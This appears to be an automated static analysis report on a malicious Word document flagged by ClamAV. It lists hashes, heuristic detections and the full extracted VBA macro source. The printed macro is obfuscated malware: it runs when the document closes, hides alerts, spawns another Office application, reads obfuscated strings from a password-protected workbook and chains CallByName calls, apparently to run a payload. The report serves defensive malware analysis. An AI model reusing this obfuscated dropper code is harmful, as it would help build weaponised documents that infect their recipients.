Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0f356cc5a6815644…

MALICIOUS

Office (OOXML)

71.1 KB Created: 2021-01-20 13:09:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-01-23
MD5: 5ef37800e61b1c1103696ebea8dba55b SHA-1: cfd911283af7184325c5a2310921696d986c39c9 SHA-256: 0f356cc5a68156449aeef5254a76ad43c996dd27c4961724b3e7d2d43e34b783
222 Risk Score

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-10033904-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-10033904-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set tcm = CreateObject(UserForm1.ComboBox1)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    xa = CallByName(Application, jx9z, 2)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8499 bytes
SHA-256: 2f674b414aa20c83d98b77e4431908924599658d8e278fdb6eb9145adb5ea076
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Public igm, trl, q5, gqnef, rc
Sub Document_Close()
nnn
End Sub
Sub nnn()
On Error Resume Next
Application.DisplayAlerts = False
Err.Number = 0
UserForm2.ComboBox1.ListIndex = 2
Dim tcm
vgof = Application.Options.AutoFormatAsYouTypeApplyHeadings
If nt > 762 Then
akesl = Application.Options.CursorMovement
nt = akesl
nt = Application.Options.ShowDiacritics
If lgm2 > 1979 Then
cvq7g = Application.Options.AutoFormatReplaceHyperlinks
lgm2 = cvq7g
End If
End If
Set tcm = CreateObject(UserForm1.ComboBox1)
tcm.DisplayAlerts = False
jx9z = "visible"
eb = "OnTime"
Dim g45
wzmdm = 1
tdo = 1
While wzmdm <> 0 And tdo < 3
Set g45 = tcm.Workbooks.Open(FileName:=UserForm2.ComboBox1, Password:=UserForm1.ComboBox2)
wzmdm = Err.Number
tdo = tdo + 1
Wend
If wzmdm <> 0 Then
xa = CallByName(Application, jx9z, 2)
If xa = True Then
zr = Application.Options.ApplyFarEastFontsToAscii
If vgof > 2786 Then
f7 = Application.Options.ShowReadabilityStatistics
vgof = f7
End If
Set p2um8 = CreateObject(UserForm1.ComboBox3)
p2um8.Documents.Open ActiveDocument.FullName, ReadOnly:=True
p2um8.Run "ThisDocument.nnn"
Else
UserForm1.ComboBox4 = UserForm1.ComboBox4 & "0"
Application.OnTime Now + TimeSerial(0, 0, 20), "ThisDocument.nnn"
End If
tcm.Quit
Exit Sub
End If
Dim fy3
Set fy3 = tcm.sheets(1)
uzg = "'"
ej = tcm.sheets(3).Cells(255, 37).Value
trl = tcm.sheets(2).Cells(158, 49).Value
igm = fy3.Cells(228, 36).Value
j1dn = tcm.sheets(2).Cells(204, 12).Value
sz = tcm.sheets(3).Cells(109, 47).Value
ul2 = Application.Options.ShowFormatError
If zr > 934 Then
fbww = Application.Options.IgnoreInternetAndFileAddresses
zr = fbww
End If
pk = Application.Options.CursorMovement
If ul2 > 1832 Then
zo = Application.Options.ButtonFieldClicks
ul2 = zo
End If
zvetl = Application.CentimetersToPoints(97)
tl = tcm.sheets(3).Cells(189, 27).Value
oh = tcm.sheets(2).Cells(65, 13).Value
vl = tcm.sheets(3).Cells(102, 36).Value
koch = tcm.sheets(1).Cells(92, 29).Value
td = tcm.sheets(2).Cells(21, 2).Value
ta68v = tcm.sheets(1).Cells(167, 7).Value
gck = tcm.sheets(3).Cells(148, 34).Value
dv = Application.Options.AllowCombinedAuxiliaryForms
zg = tcm.sheets(2).Cells(54, 10).Value
h20 = tcm.sheets(3).Cells(26, 1).Value
h42w = Application.Options.MatchFuzzyTC
If dv > 1073 Then
z3 = Application.Options.AllowCompoundNounProcessing
dv = z3
End If
lwo = tcm.sheets(3).Cells(149, 47).Value
p8 = tcm.sheets(3).Cells(223, 34).Value
hn46k = fy3.Cells(158, 27).Value
bf = tcm.sheets(2).Cells(165, 8).Value
g4w8 = tcm.sheets(1).Cells(40, 37).Value
va = tcm.sheets(3).Cells(122, 49).Value
sb4w = tcm.sheets(1).Cells(114, 21).Value
p4v = tcm.sheets(2).Cells(125, 33).Value
rc = fy3.Cells(119, 3).Value
k9g = tcm.sheets(1).Cells(251, 29).Value
pl = Application.Options.SavePropertiesPrompt
If h42w > 3731 Then
ze6 = Application.Options.SnapToShapes
h42w = ze6
End If
kf5w = Application.Options.AutoFormatReplaceOrdinals
If pl > 4118 Then
hs = Application.Options.AutoWordSelection
pl = hs
End If
raq = tcm.sheets(2).Cells(140, 11).Value
dg3f = tcm.sheets(1).Cells(212, 13).Value
kfhr = CallByName(tcm, ej, 2)
Set ev7q = UserForm1.Controls.Add("Forms.ComboBox.1")
ev7q.Value = oh & kfhr & va
Set i32 = UserForm1.Controls.Add("Forms.ComboBox.1")
i32.Value = raq
rz = Application.Options.DefaultTrayID
If kf5w > 439 Then
fm = Application.Options.InterpretHighAnsi
kf5w = fm
End If
CallByName CreateObject(ta68v), zg, 1, ev7q, sz, i32
Set c2u = CreateObject(p4v)
fkk0 = Application.Options.StoreRSIDOnSave
Set e5 = CallByName(c2u, lwo, 2)
Set v7 = CallByName(e5, sb4w, 1)
Set bf = CallByName(c2u, bf, 2)
Set gqnef = c2u
Set j1dn = CallByName(bf, j1dn, 2)
Set koch = CallByName(j1dn, koch, 2)
Set lgm2 = CallByName(koch, dg3f, 1, g4w8)
Set igm = CallByName(lgm2, igm, 2)
h20 = CallByName(igm, h20, 2)
CallByName igm, gck, 1, 1, h20
Set q5 = UserForm1.Controls.Add("Forms.ComboBox.1")
q5.Value = tl & hn46k
UserForm3.ComboBox1 = td
zy6 = Application.Options.AutoFormatReplacePlainTextEmphasis
pd = Application.Options.MatchFuzzyAY
If zy6 > 3886 Then
b8 = Application.Options.MeasurementUnit
zy6 = b8
End If
gfus = Application.Options.DefaultBorderLineStyle
If pd > 2064 Then
g6 = Application.Options.DisableFeaturesIntroducedAfterbyDefault
pd = g6
End If
q5.Value = k9g
UserForm4.ComboBox1 = UserForm3.ComboBox1
UserForm3.ComboBox1 = h20
c2u = Nothing
g45 = Nothing
fy3 = Nothing
h4ik = Application.Options.EnableMisusedWordsDictionary
If gfus > 561 Then
obc2 = Application.Options.ShowDiacritics
gfus = obc2
End If
ns = Application.Options.PictureWrapType
If h4ik > 2792 Then
sn398 = Application.Options.GridDistanceHorizontal
h4ik = sn398
End If
e5 = Nothing
v7 = Nothing
bv1g = Application.Options.UpdateLinksAtOpen
If ns > 270 Then
dq = Application.Options.AutoFormatApplyFirstIndents
ns = dq
End If
bf = Nothing
j1dn = Nothing
koch = Nothing
lgm2 = Nothing
igm = Nothing
ktak = Application.Options.MatchFuzzyZJ
If bv1g > 2334 Then
ugj = Application.Options.Pagination
bv1g = ugj
End If
gqnef = Nothing
egkw = Application.Options.AutoFormatAsYouTypeApplyDates
If ktak > 306 Then
ddpc2 = Application.Options.UseGermanSpellingReform
ktak = ddpc2
End If
DoEvents
CallByName tcm, vl, 1
tcm = Nothing
DoEvents
CallByName CreateObject(ta68v), p8, 1, oh & kfhr & va
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{DA80DBBA-3439-4291-868B-CC0EE5925740}{48987118-6E32-40EE-A906-681F1B765345}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{335DB42C-0D1E-4237-928F-8F5FD863D4A2}{78CE41EA-3C78-4963-89F2-FA312A2BFB07}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 On Error GoTo ErrorHandler

 dx = UserForm2.Controls.Count - 1
 
 If Len(UserForm1.ComboBox4) > 10 Then
 dx = dx * 2
 End If

 bb = ""
 For xr = 1 To dx Step 2
 bb = bb & UserForm2.Controls.Item(xr)
 Next

 ComboBox1.AddItem "ek"
 ComboBox1.AddItem "zo"
 ComboBox1.AddItem bb
 ComboBox1.AddItem "x9se1"
 

ly8b4 = Application.Options.DisableFeaturesIntroducedAfterbyDefault

If xr > 1268 Then


j6 = Application.Options.StrictFinalYaa

xr = j6

End If


o9 = Application.Options.SmartParaSelection

If ly8b4 > 4176 Then


h5sy = Application.Options.SaveInterval

ly8b4 = h5sy

End If

 Exit Sub
 

xy = Application.Options.MatchFuzzyBV

If o9 > 1034 Then


slc5g = Application.Options.PasteAdjustTableFormatting

o9 = slc5g

End If

ErrorHandler:
 

so = Application.Options.AutoFormatReplaceFarEastDashes

If xy > 2060 Then


wgha4 = Application.Options.DefaultBorderColorIndex

xy = wgha4

End If

 

ii = Application.Options.RTFInClipboard

If so > 4151 Then


nc = Application.Options.AddHebDoubleQuote

so = nc

End If

 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{28A33F87-65DF-4D7D-BAA5-8B68F1445670}{C2A291CB-FC1E-429F-A84B-58F3B870CBE9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.igm, ActiveDocument.trl, VbMethod, ActiveDocument.q5
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{C3B0F944-5E73-4AF4-AE7A-F086AFBDD659}{0ED11120-939E-492B-849B-B6E258E83617}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.gqnef, ActiveDocument.rc, VbMethod, ActiveDocument.q5
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 43008 bytes
SHA-256: e676cce80f15042864e9276c7de6f57fe42856dcf4365ba88162ef29299435fb
Detection
ClamAV: Doc.Malware.Valyria-10033904-0
Obfuscation or payload: unlikely